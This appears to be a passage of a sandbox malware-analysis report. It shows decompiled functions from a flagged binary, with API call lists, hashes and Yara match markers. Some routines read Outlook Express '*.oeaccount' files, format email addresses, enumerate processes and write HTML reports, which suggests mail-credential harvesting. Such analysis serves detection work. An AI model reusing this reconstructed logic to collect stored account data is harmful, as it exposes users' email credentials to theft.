                                                                                • sprintf.MSVCRT ref: 00403783
                                                                                • strcpy.MSVCRT(?,?), ref: 00403799
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                • String ID: %s@gmail.com
                                                                                • API String ID: 2649369358-4097000612
                                                                                • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                                • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040684D, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}
















                                                                                0x0040684d
                                                                                0x0040685c
                                                                                0x00406866
                                                                                0x0040686d
                                                                                0x00406872
                                                                                0x00406875
                                                                                0x0040687a
                                                                                0x0040687d
                                                                                0x00406883
                                                                                0x00406886
                                                                                0x00406889
                                                                                0x0040689a
                                                                                0x004068a6
                                                                                0x004068ab
                                                                                0x004068bb
                                                                                0x004068c5
                                                                                0x004068c9
                                                                                0x004068ce
                                                                                0x004068d9
                                                                                0x004068e1
                                                                                0x004068e4
                                                                                0x004068e7
                                                                                0x004068e7
                                                                                0x004068ea
                                                                                0x004068ea
                                                                                0x004068f0
                                                                                0x004068f1
                                                                                0x004068f4
                                                                                0x004068f7
                                                                                0x004068ff

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                • String ID: %s (%s)
                                                                                • API String ID: 3756086014-1363028141
                                                                                • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                                • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E906, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 25%
                                                                                			E0040E906(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}











                                                                                0x0040e906
                                                                                0x0040e90d
                                                                                0x0040e91d
                                                                                0x0040e92a
                                                                                0x0040e92e
                                                                                0x00000000
                                                                                0x0040e956
                                                                                0x0040e956
                                                                                0x0040e95c
                                                                                0x0040e960
                                                                                0x0040e960
                                                                                0x0040e966
                                                                                0x0040e971
                                                                                0x0040e975
                                                                                0x00000000
                                                                                0x0040e97d

                                                                                APIs
                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                • memcpy.MSVCRT ref: 0040E966
                                                                                • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                Strings
                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                • API String ID: 1640410171-3316789007
                                                                                • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                                • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410BC7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;

				_t12 = E00405ECB(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) {
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L004115D0();
						_t25 = _t15;
						_t28 = _t15;
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E004066F6(_t25, _a8, _t28, _t5);
						_t19 = _t28 + _t31;
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						E00410A8A(_t25, _t37, _a4, _t28);
						_push(_t28);
						L004115D6();
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}









                                                                                0x00410bcd
                                                                                0x00410bd6
                                                                                0x00410bd9
                                                                                0x00410be7
                                                                                0x00410be9
                                                                                0x00410bec
                                                                                0x00410bee
                                                                                0x00410bee
                                                                                0x00410bf3
                                                                                0x00410bf8
                                                                                0x00410c00
                                                                                0x00410c02
                                                                                0x00410c08
                                                                                0x00410c10
                                                                                0x00410c18
                                                                                0x00410c1f
                                                                                0x00410c22
                                                                                0x00410c25
                                                                                0x00410c27
                                                                                0x00410c2c
                                                                                0x00410c2d
                                                                                0x00410c33
                                                                                0x00000000
                                                                                0x00410c3e
                                                                                0x00410c40

                                                                                APIs
                                                                                  • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                                  • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                                  • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                                  • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                  • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                  • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                                                  • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                                  • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                                                • CloseHandle.KERNEL32(?), ref: 00410C37
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                • String ID: rA
                                                                                • API String ID: 1886237854-474049127
                                                                                • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                                                • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                                                • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409E32, Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                0x00409e38

                                                                                APIs
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                • SendMessageA.USER32 ref: 00409EBB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                • String ID:
                                                                                • API String ID: 3673709545-0
                                                                                • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                                • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                                • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409E33, Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                0x00409e38

                                                                                APIs
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A026
                                                                                  • Part of subcall function 0040A00B: SendMessageA.USER32 ref: 0040A040
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                                • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                                • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                                • SendMessageA.USER32 ref: 00409EBB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                • String ID:
                                                                                • API String ID: 3673709545-0
                                                                                • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                                • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                                • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407D0A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E00407D0A(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E004118A0(0x1004, _t17);
				_t21 =  *0x4171b8;
				if( *0x4171b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4172c0, "dialog_%d",  *0x417300);
					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407CAD, 0);
				}
				return _t8;
			}







                                                                                0x00407d12
                                                                                0x00407d17
                                                                                0x00407d1e
                                                                                0x00407d2e
                                                                                0x00407d35
                                                                                0x00407d4a
                                                                                0x00407d65
                                                                                0x00407d71
                                                                                0x00407d71
                                                                                0x00000000
                                                                                0x00407d81
                                                                                0x00407d88

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00407D35
                                                                                • sprintf.MSVCRT ref: 00407D4A
                                                                                  • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                                  • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                                  • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                                • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                                • EnumChildWindows.USER32 ref: 00407D81
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                                • String ID: caption$dialog_%d
                                                                                • API String ID: 246480800-4161923789
                                                                                • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                                • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                                • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040E255, Relevance: 9.1, APIs: 6, Instructions: 142stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 35%
                                                                                			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E004118A0(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E0040629C() == 0 ||  *0x417518 == 0) {
					if( *0x417514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x416fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x416fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040E45F(_a8,  &_v316) != 0) {
									_t64 =  *0x416fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x416fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
									E0040E172( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x416fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040E45F(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}
































                                                                                0x0040e25d
                                                                                0x0040e265
                                                                                0x0040e267
                                                                                0x0040e271
                                                                                0x0040e395
                                                                                0x0040e39b
                                                                                0x0040e3a1
                                                                                0x0040e3aa
                                                                                0x0040e3ad
                                                                                0x0040e3c0
                                                                                0x0040e3c7
                                                                                0x0040e3cd
                                                                                0x0040e44a
                                                                                0x0040e3e2
                                                                                0x0040e3ed
                                                                                0x0040e401
                                                                                0x0040e407
                                                                                0x0040e412
                                                                                0x0040e41b
                                                                                0x0040e41e
                                                                                0x0040e42b
                                                                                0x0040e438
                                                                                0x0040e444
                                                                                0x00000000
                                                                                0x0040e444
                                                                                0x00000000
                                                                                0x0040e438
                                                                                0x00000000
                                                                                0x0040e44a
                                                                                0x0040e3ad
                                                                                0x0040e283
                                                                                0x0040e28c
                                                                                0x0040e294
                                                                                0x0040e297
                                                                                0x0040e2a0
                                                                                0x0040e2a1
                                                                                0x0040e2ac
                                                                                0x0040e2ad
                                                                                0x0040e2b6
                                                                                0x0040e2bc
                                                                                0x0040e2bc
                                                                                0x0040e2c0
                                                                                0x0040e2c7
                                                                                0x0040e2ca
                                                                                0x0040e2d9
                                                                                0x0040e2e2
                                                                                0x0040e2e9
                                                                                0x0040e2fb
                                                                                0x0040e306
                                                                                0x0040e30d
                                                                                0x0040e311
                                                                                0x0040e322
                                                                                0x0040e328
                                                                                0x0040e33a
                                                                                0x0040e33f
                                                                                0x0040e344
                                                                                0x0040e345
                                                                                0x0040e34b
                                                                                0x0040e356
                                                                                0x0040e35b
                                                                                0x0040e361
                                                                                0x0040e361
                                                                                0x0040e375
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e37b
                                                                                0x0040e384
                                                                                0x0040e2d7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040e38a
                                                                                0x00000000
                                                                                0x0040e384
                                                                                0x0040e2d9
                                                                                0x0040e2ca
                                                                                0x0040e44e
                                                                                0x0040e451
                                                                                0x0040e451
                                                                                0x0040e297
                                                                                0x0040e45e

                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                                • memset.MSVCRT ref: 0040E2E9
                                                                                • memset.MSVCRT ref: 0040E2FB
                                                                                  • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                • memset.MSVCRT ref: 0040E3E2
                                                                                • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                                • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                • String ID:
                                                                                • API String ID: 3799309942-0
                                                                                • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                                • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409369, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				void* __edi;
				signed int _t51;
				char* _t53;
				char* _t63;
				intOrPtr* _t69;
				signed int _t70;
				char _t84;
				intOrPtr* _t91;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t69 = __ebx;
				_t70 = 6;
				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
				_t97 = _t96 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00405EFD(_a4, "<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t91 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
						E0040F071(_v28,  &_v68);
						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
						_t63 =  *(_t69 + 0x50);
						_t84 =  *_t63;
						if(_t84 == 0 || _t84 == 0x20) {
							strcat(_t63, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
						E00405EFD(_a4,  *(_t69 + 0x4c));
						_t97 = _t97 + 0x20;
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
				}
				return E00405EFD(_a4, 0x412b1c);
			}























                                                                                0x00409369
                                                                                0x00409373
                                                                                0x0040937c
                                                                                0x0040937c
                                                                                0x0040937e
                                                                                0x00409388
                                                                                0x00409389
                                                                                0x0040938a
                                                                                0x0040938b
                                                                                0x0040938c
                                                                                0x00409396
                                                                                0x00409397
                                                                                0x0040939c
                                                                                0x004093a3
                                                                                0x004093a9
                                                                                0x004093ac
                                                                                0x004093b2
                                                                                0x004093bd
                                                                                0x004093c0
                                                                                0x004093c2
                                                                                0x004093c2
                                                                                0x004093c5
                                                                                0x004093c8
                                                                                0x004093cc
                                                                                0x004093d0
                                                                                0x004093d4
                                                                                0x004093de
                                                                                0x004093e7
                                                                                0x004093f1
                                                                                0x00409407
                                                                                0x00409417
                                                                                0x0040941a
                                                                                0x0040941d
                                                                                0x00409421
                                                                                0x0040942e
                                                                                0x00409434
                                                                                0x0040943e
                                                                                0x00409450
                                                                                0x0040945b
                                                                                0x00409460
                                                                                0x00409463
                                                                                0x00409464
                                                                                0x004093a9
                                                                                0x0040947f

                                                                                APIs
                                                                                  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                                • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                                                • sprintf.MSVCRT ref: 00409450
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWritesprintfstrcatstrlen
                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                • API String ID: 3813295786-4153097237
                                                                                • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                                                • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                                                • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00410A8A, Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 73%
                                                                                			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v288;
				intOrPtr _v800;
				char _v1568;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v2100;
				intOrPtr _v2612;
				char _v3124;
				char _v3636;
				intOrPtr _v3640;
				void* _v5768;
				char _v5796;
				void* __ebx;
				void* __edi;
				void* __esi;
